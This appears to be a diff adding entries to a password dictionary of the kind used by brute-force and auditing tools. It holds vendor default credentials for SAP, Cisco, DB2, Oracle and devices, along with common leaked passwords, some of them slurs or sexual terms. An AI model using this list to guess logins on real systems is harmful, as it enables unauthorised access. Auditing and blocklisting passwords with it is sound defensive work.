+SECONDARY
+SECRET
+SECRET123
+SECURITY
+SENTINEL
+SER
+SERVICE
+SERVICECONSUMER1
+SESAME
+SH
+SHELVES
+SITEMINDER
+SKY_FOX
+SLIDEPW
+SMDR
+SNMP
+SNMP_trap
+SNOWMAN
+SQL
+SSA
+STARTER
+STEEL
+STRAT_PASSWD
+STUDENT
+SUN
+SUPER
+SUPERSECRET
+SUPERVISOR
+SUPPORT
+SWITCH
+SWITCHES_SW
+SWORDFISH
+SWPRO
+SWUSER
+SW_AWARD
+SYMPA
+SYS
+SYS1
+SYSA
+SYSADM
+SYSLIB
+SYSMAINT
+SYSMAN
+SYSPASS
+SYSTEM
+SYSTEST
+SYSTEST_CLIG
+SZYX
+Secret
+Security
+Serial
+Sharp
+Silicon1
+SnuFG5
+SpIp
+Spacve
+Suckit1
+Summer12
+SunnyJim7
+Super
+Super123
+Switch
+Sxyz
+Symbol
+Sysop
+System
+T4urus
+TAHITI
+TANDBERG
+TCH
+TDOS_ICSAP
+TELEDEMO
+TELESUP
+TENmanUFactOryPOWER
+TEST
+TESTPILOT
+TJM
+TMSADM $1Pawd2&
+TMSADM ADMIN
+TMSADM PASSWORD
+TOAD
+TRACE
+TRAVEL
+TSDEV
+TSEUG
+TSUSER
+TTPTHA
+TURBINE
+Tamara01
+Tasmannet
+Telecom
+Test1234
+TheLast1
+Tiger
+Tiny
+Tokyo1
+Toshiba
+Trintech
+TrustNo1
+TzqF
+UETP
+UI-PSWD-01
+UI-PSWD-02
+ULTIMATE
+UNKNOWN
+USER
+USER0
+USER1
+USER2
+USER3
+USER4
+USER5
+USER6
+USER7
+USER8
+USER9
+USERP
+USER_TEMPLATE
+UTLESTAT
+Un1verse
+Und3rGr0und
+User
+VAX
+VCSRV
+VESOFT
+VIDEO
+VIF_DEV_PWD
+VIRUSER
+VMS
+VRR1
+VTAM
+Varadero
+Vextrex
+WANGTEK
+WEBCAL01
+WEBDB
+WEBREAD
+WELCOME
+WINDOWS_PASSTHRU
+WINSABRE
+WKSYS
+WLAN_AP
+WOOD
+WORD
+WWW
+WWWUSER
+WebBoard
+Welcome0
+Welcome1
+Welcome123
+What3v3r
+Windows1
+Winston1
+Wireless
+X#1833
+XLSERVER
+XMI_DEMO sap123
+XPRT
+YES
+ZAAADA
+ZAQ!2wsx
+Zaq1xsw2
+Zenith
+Zxasqw12
+[^_^]
+_Cisco
+a11b12c13
+a123456
+a12345678
+a13a13
+a1b2c3d4e5
+a1b2c3d4e5f6
+a1rplan3
+aLLy
+aPAf
+aa
+aaaa
+aaaaa
+aaaaaa
+aaaaaaaa
+aaliyah
+aammii
+aaron
+abang78
+abc
+abc#123
+abc123
+abc123!!
+abc123d4
+abcd
+abcd-1234
+abcd1234
+abcde
+abcdef
+abcdef3
+abcdefg
+abcdl2e
+abcdpass
+abd234
+abhaile1
+abigail
+abra
+abraham
+abrakadabra
+abusive
+acc
+access
+accobra
+accord
+accounting
+action
+acuario
+adam
+adaptec
+adfexc
+adidas
+adm
+adm12345
+admin
+admin000
+admin001
+admin01
+admin1121
+admin123
+admin1234
+admin222
+admin_1
+adminadmin
+admini
+administrator
+adminpass
+adminpasswd
+adminpwd
+admint
+adminttd
+admn
+admpw
+adoado
+adobe
+adobeadobe
+adrian
+adriana
+adriano
+adslolitec
+adslroot
+adtran
+advcomm500349
+adworks
+agent
+agent_steal
+aileen
+aipai
+airborne
+airforce
+airlines
+airplane
+ajlesd
+akula123
+al2e4
+al2e4s
+alabama
+alarcon
+alaska
+albatros
+albert
+alberto
+alejandra
+alejandro
+alex
+alexa
+alexande
+alexander
+alexandra
+alexandru
+alexia
+alexis
+alexl
+alexo
+alfarome
+alfonso
+alfred
+alfredo
+alice
+alicia
+alien
+alisha
+alison
+all
+all private
+all public
+allen
+allison
+allot
+allstar
+alog123
+alonso
+alpargata
+alpha
+alpha1
+alpine
+alvin
+always
+alyssa
+amanda
+amateur
+amazing
+amber
+amelia
+america
+american
+amigas
+amigos
+amigosw1
+amilopro
+amistad
+amorcito
+amore
+amores
+amormio
+an0th3r
+anakonda
+anakonda1
+anamaria
+anderson
+andre
+andrea
+andreea
+andrei
+andreita
+andres
+andrew
+andrew1
+andrewl
+angel
+angel1
+angel2
+angel2000
+angel9
+angela
+angelbaby
+angeles
+angelica
+angelina
+angelita
+angelito
+angell
+angelo
+angels
+angie
+angusyoung
+anicust
+animal
+animals
+anime
+anita
+annette
+annie
+anon
+anthony
+anthony1
+anthonyl
+antibiotico
+antonio
+any@
+anyadhogyvan
+anything
+apa123
+apc
+apollo
+apollo11
+apple
+applepie
+apples
+apricot
+april
+april2
+aprill
+apstndp
+aq12wsxz
+aqq123
+aqua2000
+aquarius
+archie
+ardrossan
+argentina
+ariana
+arianna
+ariel
+aries
+aristoteles
+arizona
+arlene
+armando
+arnold
+arsenal
+arthur
+articon
+arturo
+asante
+ascend
+asd
+asd123
+asd123qwe
+asdQWE123
+asdasd
+asdewq
+asdf
+asdf1234
+asdfasdf
+asdfg
+asdfgh
+asdfghj
+asdfghjk
+asdfghjkl
+asdfhjkl
+asdlkj
+asdlkj12
+asdlkj123
+asecret
+ashanti
+ashlee
+ashleigh
+ashley
+ashley1
+ashleyl
+ashton
+aspirine
+asshole
+assman
+astime
+at4400
+atacan
+atc123
+athena
+athlon64
+atlant1s
+atlanta
+atlantis
+attack
+aubrey
+audrey
+augmentin
+august
+august2
+augustl
+aurora
+austin
+australia
+author
+autocad
+autumn
+avalon
+aventura
+avril
+award.sw
+award_?
+award_ps
+awesome
+awkward
+ax400
+axis2
+azerty
+aztech
+b4lls4ck
+babbit
+babes
+babies
+baby
+baby2
+babyblue
+babyboo
+babyboy
+babycakes
+babydoll
+babyface
+babygirl
+babygirl1
+babygirl2
+babygirll
+babygirlo
+babygurl
+babygurll
+babyko
+babyl
+babylove
+babyo
+babyphat
+backdoor
+backuponly1
+backuprestore1
+badass
+badboy
+badg3r5
+badger
+badgirl
+bagabu
+bailey
+baller
+ballet
+ballin
+balls
+bambam
+bamsty
+banana
+bananas
+banane1
+bandit
+bang
+baofeng
+barbara
+barbetta
+barbie
+barbusse
+barcelona
+barney
+barricade
+baseball
+basisk
+basket
+basketball
+bass
+bastard
+batista
+batman
+baxter
+bball
+bbbbbb
+bbs
+bciimpw
+bcimpw
+bcmspw
+bcnaspw
+beach
+bear
+beatles
+beatriz
+beautiful
+beauty
+beaver
+beavis
+bebita
+becca
+beckham
+becky
+beer
+belinda
+bell9
+bella
+belle
+benfica
+benitocameloo
+benjamin
+benji
+benny
+berlin
+bernard
+bestfriend
+bestfriends
+bethany
+betty
+bettyboop
+bewan
+beyonce
+bhaby
+bhebhe
+bianca
+bier
+bigboy
+bigbuddy
+bigcock
+bigdaddy
+bigdick
+bigdog
+bigmac
+bigman
+bigred
+bigred23
+bigtits
+bill
+billabong
+billie
+billy
+billybob
+bin
+bintec
+biodata
+bios
+biosstar
+biostar
+birdie
+birdshit
+birthday
+bishop
+bismillah
+bitch
+bitch1
+bitches
+bitchl
+bitchy
+biteme
+bla123
+blabla
+blabla12
+blablabla
+black
+black321
+blackie
+blackonblack
+blacky
+blahblah
+blake
+blanca
+blank
+blazer
+blender
+blessed
+blink182
+blinkl8
+blizzard
+blonde
+blondie
+blood
+bloods
+blossom
+blowjob
+blowme
+blubje
+blue
+blue2
+blueberry
+blueeyes
+bluel
+bluepw
+bluespot
+bmw12345
+bobby
+bobthebuilder
+boca
+bohemia
+bollocks
+bomba
+bonbon
+bond007
+bondage
+bonita
+bonnie
+boobies
+booboo
+boobs
+booger
+boogie
+boomer
+booty
+boricua
+boss
+boston
+bowling
+bowwow
+bpel
+bradley
+brandi
+brandon
+brandon1
+brandonl
+brandy
+bratz
+braves
+brayden
+brazil
+breanna
+brenda
+brendan
+brian
+brian0711
+briana
+brianna
+brightmail
+britney
+britt
+brittany
+brittney
+brocade1
+broken
+bronco
+broncos
+brooke
+brooklyn
+brother
+brown
+brownie
+browns
+browsepw
+bruno
+brutus
+bryan
+bryant
+bsxpass
+bubba
+bubba1
+bubble
+bubblegum
+bubbles
+bubbles1
+bublik
+bubububu
+buddha
+buddy
+buddy1
+budlight
+buffalo
+buffy
+bugsbunny
+builtin
+bulldog
+bulldogs
+bullet
+bullshit
+bunny
+burek123
+burton
+busted
+buster
+butt
+butter
+buttercup
+butterfly
+butterfly1
+butthead
+buttons
+bynthc
+c
+c@lvin
+cabajka
+cable-d
+cacadmin
+caesar
+cairell
+caitlin
+calamar
+caleb
+california
+callie
+calliope
+callofduty
+callum
+calv1n
+calvin
+calvin!
+calvin1
+calvin22
+calvin99
+camaro
+cameron
+camila
+camille
+camilo
+campanita
+canada
+cancer
+candice
+candy
+cannon
+canon_admin
+cantik
+capricorn
+captain
+caramel
+caramelo
+cardinal
+carebear
+carina
+carla
+carla123
+carlitos
+carlo
+carlos
+carmen
+carol
+carolina
+caroline
+carpediem
+carrie
+carson
+carter
+cartman
+cascade
+casey
+casper
+cassandra
+cassidy
+cassie
+castillo
+catalina
+catarina
+catch22
+catdog
+catfish
+catherine
+cathy
+catinthehat
+cbtp
+cc
+ccaere
+cclfb
+ccrusr
+cdn123
+cdvcdv
+cdwv
+cecilia
+celeste
+cellit
+cellphone
+celtic
+celticfc
+central
+cesar
+cgadmin
+ch4ng3m3
+chacha
+champion
+chance
+chandler
+chanel
+change
+change_on_install
+changeit
+changeme
+changeme!
+changeme1
+changeme123
+changeme2
+changeme20
+changemes
+changethis
+charlene
+charles
+charlie
+charlie1
+charlotte
+charmed
+chase
+cheche
+check123
+checkfs
+checkfsys
+checksys
+cheeky
+cheer
+cheerl
+cheerleader
+cheero
+cheese
+cheetah
+chelle
+chelsea
+cheng1234
+cherokee
+cherries
+cherry
+cheryl
+chester
+chevelle
+chevy
+cheyenne
+chicago
+chichi
+chicken
+chicks
+chico
+children
+chile62
+china
+chingy
+chinita
+chiquita
+chivas
+chloe
+chocolate
+chopper
+chris
+chris1
+chris2
+chrisb
+chrisbrown
+chrisl
+chriso
+chrissy
+christ
+christian
+christin
+christina
+christine
+christmas
+christopher
+christy
+chronic
+chubby
+chucky
+church
+ciang
+cinderella
+cindy
+cinnamon
+cisco
+cisco123
+ciscocisco
+ciscofw
+cisko
+citel
+claire
+classic
+classo
+classofo
+claudia
+clayton
+cleopatra
+client
+clifford
+clinton
+cloud
+clover
+cmaker
+cmlslc
+cms500
+cobra
+cocacola
+cock
+coconut
+coffee
+colleen
+college
+collins123
+colombia
+colorado
+comcomcom
+community
+compaq
+compaq2003
+computer
+computer1
+condo
+conexant
+confused
+connect
+conner
+connie
+connor
+console
+consults
+control
+converse
+cookie
+cookie1
+cookies
+cool
+coolcat
+cooldude
+coolgirl
+coolio
+cooper
+copper
+corazon
+core
+corecess
+corey
+corona
+correct
+corvette
+cosita
+cougar
+country
+courtney
+cowboy
+cowboys
+cowgirl
+coyote
+cpe1704tks
+cracker
+craft
+craftpw
+crash
+crashbandicoot
+crazy
+cream
+creative
+credu
+crew10
+crftpw
+cricket
+cristian
+cristiano
+cristina
+cristo
+crystal
+csigabiga
+cthdfr
+cti4ever
+ctrls
+cuddles
+cukorborso
+cumming
+cumshot
+cunt
+cupcake
+curtis
+custpw
+cuteako
+cutegirl
+cuteko
+cutel
+cuteme
+cutie
+cutiel
+cutiepie
+cuties
+cuttie
+cy
+cydvb
+cynthia
+cyphte
+d.e.b.u.g
+d00rmat
+d0dger
+d0m1n0
+d1ngd0ng
+d3ft0n3s
+daddy
+daddy1
+daddysgirl
+dadmin
+dadmin01
+daemon
+daemon09
+daisy
+dakota
+dalejr
+dallas
+dalton
+damian
+damien
+damin
+dance
+dancer
+dancerl
+dancing
+danger
+danica
+daniel
+daniel1
+daniela
+daniell
+danielle
+danilo
+danny
+darius
+darkangel
+darkness
+darkside
+darling
+darren
+darwin
+darwin99
+dasusr1
+dave
+david
+david1
+davidl
+davox
+dayana
+db2admin
+db2fenc1
+db2inst1
+db2pass
+db2password
+db2pw
+dbase
+dbpass
+dbps
+ddemde
+deanna
+death
+debbie
+debug
+debugs
+december
+december2
+decemberl
+deedee
+default
+default.password
+defero
+delfin
+delled0
+delta
+demo
+demos
+deneme
+denise
+dennis
+dennis96
+denver
+derek
+derrick
+desiree
+destiny
+device
+devil
+devils
+devin
+dexter
+dhs3mt
+dhs3pms
+diablo
+diamond
+diamonds
+diana
+dianita
+dianne
+dick
+dickhead
+diego
+diesel
+dietcoke
+digger
+digital
+dikdik
+dilbert
+dillon
+dimdim
+dimple
+dimples
+dinamo
+diosesamor
+dipset
+dirty
+disney
+distrib0
+disttech
+divine
+dixie
+djonet
+dmr99
+dn_04rjc
+dni
+dnnadmin
+dnnhost
+doctor
+dodgers
+doggie
+doggy
+dolphin
+dolphins
+dominic
+dominique
+domino
+donald
+donkey
+donna
+donnie
+donovan
+doodle
+doraemon
+doris321
+dorothy
+doruk
+dos
+dottie
+douglas
+draadloos
+dragon
+dragonfly
+dragons
+dream
+dream182
+dreamer
+dreams
+dreamweaver
+driver
+dropship
+dropzone
+drowssap
+drpepper
+drummer
+dtvbhx
+ducati
+ducati900ss
+dude
+duffy123
+duke
+dulce
+duncan
+dustin
+dvnstw
+dvr2580222
+dvst10n
+dwayne
+dweeble
+dylan
+e250changeme
+e500changeme
+eagle
+eagle1
+eagles
+eastside
+easy123
+easyway
+eatme
+echo
+eclipse
+ecuador
+eddie
+edgar
+eduardo
+edward
+edwin
+eeyore
+efmukl
+einstein
+ekdrms
+elaine
+electric
+element
+elena
+elephant
+elijah
+elizabet
+elizabeth
+ellie
+elvis
+emanuel
+emerald
+emilio
+emily
+eminem
+emmanuel
+emotional
+empire
+enable
+engineer
+england
+enhydra
+enigma
+enjoy
+enquirypw
+enrique
+enter
+enter123
+enter123321
+epicrouter
+eragon1
+eric
+erica
+erick
+erika
+ernesto
+erotic
+esmeralda
+esperanza
+esteban
+esther
+estrella
+estrellita
+etas
+eternity
+ethan
+eugene
+eunice
+evelyn
+everton
+evilpenguin
+exinda
+expert03
+exploit
+explorer
+extazy
+extendnet
+extreme
+ezit
+ezone
+f00b4r
+f00bar
+f00sball
+f18hornet
+f4g5h6j7
+fabian
+fabiola
+fabulous
+face2face
+factory
+faith
+fal
+falcon
+falcons
+falloutboy
+fam
+familia
+family
+familymacintosh
+famous
+fantasy
+fashion
+fastweb
+faszom
+fatboy
+fatcat
+father
+fatima
+fax
+fdsa
+february
+felicia
+felipe
+felix
+fender
+fergie
+fernanda
+fernandes
+fernando
+ferrari
+fibranne
+ficken2000
+field
+field-service
+figarofigaro
+fire
+fire1818
+fireman
+firstsite
+fischer123
+fish
+fisher
+fishing
+fivranne
+flapjack
+flaquito6
+flash
+flat24
+flores
+florida
+florida69
+flower
+flowers
+fluffy
+flyboy
+flyers
+flying
+foo123
+foobar
+foolproof
+football
+football1
+footballl
+ford
+forest
+forever
+forget
+formeforme
+fotos1
+france
+frances
+francis
+francisco
+frank
+frankie
+franklin
+freak
+freaky
+freckles
+fred
+freddie
+freddy
+free
+freedom
+freedom35
+freedumb1
+freekevin
+freepass
+freetown1
+freeuser
+fresher
+fresita
+friday
+friend
+friends
+friendship
+friendster
+frogger
+froggy
+ftp
+fubar
+fuck
+fuckbitchesgetmoney
+fucked
+fucker
+fucking
+fuckit
+fucklove
+fuckme
+fuckoff
+fucku
+fuckyou
+fuckyou1
+fuckyou2
+funkwerk
+funny
+funshion
+futbol
+fw
+g6PJ
+g8keeper
+gabby
+gabriel
+gabriela
+gabrielle
+galore
+games
+ganda
+gandako
+gandalf
+gandalf6
+gangsta
+gangster
+ganteng
+garcia
+garfield
+garrett
+gateway
+gatita
+gatito
+gators
+gbpltw
+gemini
+geminis
+gen1
+gen2
+general
+genesis
+genius
+genius123
+george
+georgia
+gerald
+geraldine
+gerard
+gerardo
+german
+germany
+gerrard
+get2it
+getmoney
+getoutofhere
+gfhjkm
+gfhjkmrf
+ggdaseuaimhrke
+ghbdtnbr
+ghetto
+giants
+gibson
+giggles
+gigi99
+gilbert
+ginger
+giovanni
+girl
+girls
+gizmo
+gladys
+glftpd
+glitter
+gloria
+gmmkh
+goblue
+godbless
+godblessyou
+goddess
+godisgood
+godislove
+godzilla
+goethe
+golden
+goldfish
+goldie
+goldstar
+golf
+golfer
+gomachan
+goneo
+gonzalez
+goober
+good
+goodgirl
+google
+gopher
+gordon
+gorefest
+gorgeous
+gothic
+gowest!
+grace
+gracie
+grandma
+granny
+grapenuts
+gravis
+gravity
+great
+green
+greenday
+greenl
+gregory
+groovy
+grouper
+guadalupe
+guardone
+guest
+guest1
+guestgue
+guillermo
+guinness
+guitar
+gunner
+gustavo
+gwapako
+gymnast
+h179350
+h6BB
+hagpolm1
+hahaha
+hailey
+haley
+hallo
+hallo12
+hallo123
+halt
+hamilton
+hammer
+hamster
+handsome
+hannah
+hannah1
+hannover96
+hanseatic
+happiness
+happy
+happy1
+happyhippo
+hard
+hardcore
+hardon
+harley
+harley1985
+harmony
+harold
+harris
+harrison
+harry
+harrypotter
+harvey
+hasan12345
+hashimoto
+haslo123
+hawaii
+hawk201
+hawkeye
+hayden
+hayley
+hazel
+hdms
+he
+head
+heart
+hearts
+heather
+heaven
+hector
+heka6w2
+heleli
+helena
+hello
+hello1
+hello123
+hellokitty
+hellol
+help
+help1954
+helpme
+helson
+hendrix
+henry
+hentai
+hercules
+hermione
+hermosa
+hernandez
+hero777
+hershey
+hewlpack
+heyhey
+highspeed
+hilary
+hiphop
+hitman
+hobbes
+hobbs
+hockey
+hogehoge
+holas
+holden
+holiday
+holla
+hollie
+hollister
+holly
+hollywood
+homer
+honda
+honduras
+honey
+honey2
+honeyko
+honeyl
+hongkong
+hooker
+hooters
+horney
+horny
+horse
+horses
+hotboy
+hotchick
+hotdog
+hotgirl
+hotmail
+hotmama
+hotpink
+hotrod
+hotstuff
+hottie
+hottie1
+hottiel
+house
+houston
+howard
+howard03
+hp.com
+hp_admin
+hpinvent
+hpt
+hqadmin
+hs7mwxkk
+hsadb
+huawei
+hummer
+humppa
+hunter
+hunting
+hyperdrive
+i
+iDirect
+iamthebest
+ibddls
+ibm
+ibmcel
+icecream
+iceman
+iconto
+ictel
+idontknow
+ihateu
+ihateyou
+ilmi
+ilom-admin
+ilom-operator
+ilon
+ilove
+iloveboys
+ilovechris
+ilovegod
+ilovehim
+ilovejesus
+ilovejosh
+ilovematt
+iloveme
+ilovemike
+ilovemom
+ilovemyself
+ilovetessa
+iloveu
+iloveu2
+iloveyou
+iloveyou!
+iloveyou1
+iloveyou2
+iloveyoul
+iluvme
+iluvu
+iluvyou
+images
+imissyou
+imperial
+imsa7.0
+imss7.0
+inads
+incubus
+indian
+indonesiaraya
+indspw
+infinity
+informix
+infrant1
+ingrid
+init
+initpw
+inlove
+insane
+inside
+install
+installer
+integra18
+integra99
+intel
+intermec
+internal
+internet
+inuvik49
+inuyasha
+inverter
+iolan
+ip20
+ip21
+ip3000
+ip305Beheer
+ip400
+ipax
+ireland
+irish
+irock
+ironman
+ironport
+isaac
+isabel
+isabella
+isabelle
+isaiah
+iscopy
+isdev
+isee
+isolation
+isp
+israel
+italia
+itsasecret
+iubire
+iverson
+iwantu
+iwill
+j09F
+j256
+j262
+j322
+j5Brn9
+j64
+jack
+jack1998
+jackass
+jackie
+jackson
+jackson88
+jacob
+jaguar
+jaime
+jake
+jamaica
+james
+james1
+james2
+jamesl
+jamie
+jander1
+janelle
+janice
+janine
+janjan
+jannie
+january
+japan
+jared
+jasmin
+jasmine
+jasmine1
+jason
+jasper
+jasperadmin
+javier
+jayden
+jayjay
+jayson
+jazmin
+jazmine
+jazzy
+jbvm
+jeff
+jefferson
+jeffrey
+jellybean
+jenjen
+jenna
+jennie
+jennifer
+jenny
+jeremiah
+jeremy
+jermaine
+jerome
+jerry
+jersey
+jesse
+jessica
+jessica1
+jessical
+jessie
+jester
+jesucristo
+jesus
+jesus1
+jesuschrist
+jesusl
+ji394su3
+jiemou3i
+jillian
+jimmy
+joana
+joanna
+joanne
+jocelyn
+joejonas
+joeuser
+joh316
+johanna
+john
+john2008
+johncena
+johnel
+johnl
+johnny
+johnny50
+johnson
+joker
+joljee
+jonas
+jonathan
+jones
+jonjon
+jordan
+jordan1
+jordan2
+jordan23
+jordanl
+jordano
+jorge
+josel
+joseluis
+joseph
+josephine
+joshl
+joshua
+joshua1
+joshuao
+joyce
+joyjoy
+jstwo
+jtjd
+juancarlos
+juanita
+juanito
+judith
+juice
+juicy
+juke2008
+julia
+julian
+juliana
+julie
+juliet
+juliette
+julio
+julius
+july2
+julyl
+june2
+junel
+juneo
+junior
+junjun
+junker
+jupiter
+justice
+justin
+justin1
+justine
+justinl
+justino
+justme
+juventus
+k123
+k1rs1kka
+k4hvdq9tj9
+kailro
+kaitlyn
+kakala
+kalap
+kali2002
+kalimera
+kalvin
+kane
+karate
+karen
+karina
+karkulka
+karla
+karlita
+karmal
+katana
+katelyn
+katherine
+kathleen
+kathryn
+kathy
+katie
+katrina
+kawasaki
+kaykay
+kayla
+kaylee
+kayleigh
+kcm
+keepout123
+keisha
+keith
+kelly
+kelsey
+kelvin
+kendall
+kendra
+kennedy
+kenneth
+kenny
+kenzan
+kenzie
+kermit
+kevin
+keystone
+kiara
+kieran
+killa
+killer
+kilo1987
+kimberly
+king
+kingkong
+kingofthehill
+kingswood
+kirsten
+kirsty
+kisses
+kisskiss
+kissme
+kissmyass
+kitkat
+kitten
+kittens
+kitty
+kittycat
+kittykat
+klimis
+klmnxx
+km123456
+kn1TG7psLu
+knight
+kodiak
+kolobezka
+komprie
+kosten
+kpact
+krakonos
+kramer
+krissy
+kristen
+kristin
+kristina
+kristine
+kronites
+krumholz
+krystal
+ksdjfg934t
+kucing
+kukareku
+kuku
+kusakusa
+l0v3m3
+l1
+l2
+l2e4s6a
+l2e4sa
+l2eabc
+l2eqwe
+l3
+l8rsk8r
+labas123
+lacoste
+lacrosse
+ladies
+ladybug
+laflaf
+laguna
+lakers
+lalala
+lampard
+landon
+langke
+lantronix
+larry
+last
+lasvegas
+latina
+laura
+lauren
+lavender
+lawrence
+lbyjpfdh
+leanne
+leather
+leaves
+leelee
+legend
+legolas
+leigh
+lemon123
+lenor
+leoleo
+leonard
+leonardo
+lesarotl
+lesbian
+leslie
+lester
+letacla
+letmein
+letmein1
+letmein2
+letmeout
+letmesee
+level10
+leviton
+lewis
+lheujq
+liberty
+libra
+lickme
+lifehack
+lifeline
+lifesucks
+light
+lights
+liliana
+lillian
+lilly
+lilmama
+lilman
+lilwayne
+lincoln
+linda
+lindsay
+lindsey
+lineprin
+linga
+linkin
+linkin123
+linkinpark
+linux99
+lipgloss
+liquidtension
+lisa
+little
+liverpoo
+liverpool
+lizard
+lizzie
+lkilogmL
+lkw
+lkwpeter
+llatsni
+lll-222-l9eeemailaaddress.tst
+localadmin
+locatepw
+lofasz
+logan
+logapp
+logitech
+lokita
+lol
+lolipop
+lolipop2
+lolita
+lollipop
+lollol
+lollypop
+london
+lonely
+long
+longhorns
+looker
+looking
+lopata
+lopez
+loran123
+lord1234
+lorena
+lorenzo
+lorraine
+loser
+louie
+louise
+loulou
+lourdes
+love
+love12
+love123
+love2
+love2oo
+love4ever
+love6
+love8
+love9
+loveable
+lovebug
+lovee
+lovehurts
+lovel
+loveless
+lovelife
+lovelo
+lovelove
+lovely
+lovely1
+loveme
+loveme1
+loveo
+lover
+lover1
+loverboy
+lovergirl
+loverl
+lovers
+loves
+lovesucks
+loveu
+loveya
+loveyou
+loving
+lp
+lpadm
+lpadmin
+lpassword
+lq2wee
+lq2wee4r
+lqaz2wsx
+lsxol
+lucas
+lucenttech1
+lucenttech2
+lucero
+lucky
+lucky1
+lucky7
+luckyl
+lucy99
+ludacris
+luisa
+luke1993
+lunita
+lupita
+lynx
+m0t0rhead
+m1122
+m1link
+m1r4nd4
+m45t3rm1nd
+mMmM
+machine
+mackenzie
+mackousko
+macmac
+macromedia
+madalina
+maddie
+maddog
+madeline
+madison
+madman18
+madmax
+madonna
+maganda
+magex
+maggie
+magic
+magnum
+mahal
+mahalkita
+mahalko
+mahalkoh
+mail
+maine207
+mainstreet
+maint
+maintain
+maintpw
+makayla
+maldita
+malibu
+mama1234
+mamapapa
+mamita
+man
+manage
+manager
+manchester
+mandy
+manman
+manson
+manuel
+manuela
+manunited
+manutd
+mar1jane
+marcela
+marcelo
+march
+march2
+marchl
+marco
+marcos
+marcus
+margaret
+margarita
+maria
+maria1988
+mariah
+marian
+mariana
+maribel
+marie
+marie1
+mariel
+mariela
+marilyn
+marina
+marine
+marines
+mario
+marion
+mariposa
+marisa
+marisol
+marissa
+marius
+marjorie
+mark
+marlboro
+marlene
+marley
+marlon
+married
+marshall
+martha
+martin
+martina
+martinez
+marvin
+maryjane
+mason
+master
+masterkey
+masterok
+mathew
+matrix
+matt
+matthew
+matthew1
+mature
+maureen
+maurice
+mauricio
+maverick
+maxima
+maximus
+maxine
+maxwell
+maymay
+mayra
+mazafaka
+mc1029
+mckenzie
+mcknight88
+me
+mediator
+medina
+medion
+megabit
+megan
+megatron
+meghan
+melanie
+melinda
+melisa
+melissa
+melody
+melvin
+member
+mememe
+mendoza
+mercedes
+mercury
+merlin
+mermaid
+metallic
+metallica
+mexican
+mexico
+mexx6399
+mfd
+mhine
+mi
+miamor
+michael
+michael1
+michaela
+michaell
+micheal
+michel
+michelangelo
+michele
+michelle
+michelle1
+michigan
+mickey
+mickeymouse
+microbusiness
+microsoft
+midnight
+mierda
+miguel
+mihaela
+mike
+mikeiscool
+mikel
+mikey
+milagros
+milkshake
+miller
+millie
+mine
+minime
+minnie
+miracle
+miranda
+miriam
+mirrormirror
+mississippi
+missy
+mistress
+misty
+mitchell
+mlusr
+mmmmmm
+mngt
+moises
+mollie
+molly
+momdad
+mommy
+mommy1
+momof
+monday
+money
+money1
+monica
+monika
+monique
+monitor
+monkey
+monkey1
+monkey2
+monkeybutt
+monkeyl
+monkeyo
+monkeys
+monster
+montana
+moocow
+mookie
+moomoo
+moonlight
+moose
+morales
+morena
+moreno
+morgan
+morris
+mother
+motorola
+mountain
+mountfs
+mountfsys
+mountsys
+mouse
+movie
+mozart
+mp3mystic
+mpegvideo
+mtch
+mtcl
+mu
+muffin
+muffinman
+mujama
+mummy
+mumuland
+munchkin
+munchkin10
+mupali
+murphy
+music
+musica
+mustang
+mustang70
+muze
+mvemjsunp
+mwmwmw
+my
+my_DEMARC
+myangel
+mybaby
+mykids
+mylife
+mylove
+myname
+mysecretpassword0*
+myself
+myspace
+myspace1
+mysweex
+n0d0ubt1
+n0ttelling
+naadmin
+nadine
+naked
+nancy
+naruto
+nas123
+nascar
+natalia
+natalie
+natasha
+nathan
+nathaniel
+naughty
+naynay
+ncadmin
+ncc1701
+ncc1701d
+ncrm
+negrita
+nelly
+nelson
+nemesis
+nemtom1
+nenita
+nerdnerd
+net101
+netadmin
+netbotz
+netgear1
+netlink
+netman
+netnet
+netopia
+netscreen
+network
+nevaeh
+new_password
+newcastle
+newlife
+newport
+news
+newyork
+nfmvta
+nicecti
+nicholas
+nichole
+nician
+nickjonas
+nicky
+nicola
+nicolas
+nicole
+nicole1
+nicole2
+nicolel
+nicoleo
+nigga
+nigger
+nightmare
+nigugu
+nike2008
+nikita
+nikki
+nimda
+nimdaten
+ninja
+nintendo
+nipple
+nipples
+nirvana
+nissan
+nitech
+nitram
+nm2user
+nms
+nmspw
+no
+nobchan
+nobody
+nokai
+nokia
+none
+noodle
+noodles
+nopass
+nopasswd
+nopermission
+norman
+nortel
+not4u2c
+nothing
+nottelling
+nova21
+novell
+november
+november2
+novemberl
+noway
+npwfkl
+nsa
+nsi
+nsroot
+ntacdmax
+ntpupdate
+nttocn
+number
+number1
+number66
+nursing
+nz0u4bbe
+oceans11
+ocnc123
+october
+october2
+octoberl
+odiotodo
+ods
+offshore
+oliver
+olivia
+omarion
+omfglol1
+omgomg123
+omneon
+onelove
+online
+ontology
+op
+opengate
+openview
+operator
+oqksad
+oracle
+orange
+orlando
+orpheus
+oscar
+otbu+1
+ou812
+outlaw
+overseer
+p3t3rpan
+p@ssw0rd
+pa$$w0rd
+pa$$word
+pablo
+packard
+packers
+paige
+pakistan
+paloma
+pamela
+pancho
+panda
+pandemonium
+panget
+pangit
+pantera
+pantera69
+panther
+panthers
+panties
+paola
+papito
+par0t
+paradise
+paramore
+paris
+parker
+parmesan
+parola
+parolamea
+party
+pasaway
+pass
+pass123
+passion
+passion12
+passport
+passw0rd
+passw0rd1
+password
+password1
+password1`
+password2
+password201
+password209
+password55
+passwordl
+passwordo
+passwort
+patches
+pathology
+patito
+patricia
+patrick
+patrickb123
+patriots
+patrol
+paul
+paula
+paulina
+pauline
+paulo
+pavilion
+payton
+pbxk1064
+peace
+peaches
+peanut
+pearljam
+pebbles
+pedro
+peekaboo
+peewee
+peluche
+pelusa
+pencil
+penelope
+penguin
+penis
+penny
+pento
+people
+pepper
+pepsi
+pepsi2008
+pepson
+perfect
+peribit
+permit
+pervert
+peter
+peter123
+peterpan
+petert999
+pfsense
+phantom
+philip
+phillip
+philly
+phishfood
+phoebe
+phoenix
+phoenix602
+photos
+photoshop
+phpbb
+phplist
+phpreactor
+picard
+pickle
+pickles
+picture
+pictures
+picus
+pieceofshit
+pierre
+piggy
+piglet
+pikachu
+pilou
+pimp
+pimpin
+pimpl
+pineapple
+pink
+pink2
+pinkie
+pinkl
+pinko
+pinky
+piolin
+piranha
+pirate
+pirates
+pisces
+pitbull
+pixadmin
+pixmet2003
+pizza
+pizza42
+platinum
+playboy
+player
+playgirl
+playstation
+please
+plokijuh
+plopplop
+pnadmin
+poepchinees
+pogiako
+poi098
+pokemon
+pokemon!
+police
+poll
+pollito
+poloppolop
+pontiac
+poohbear
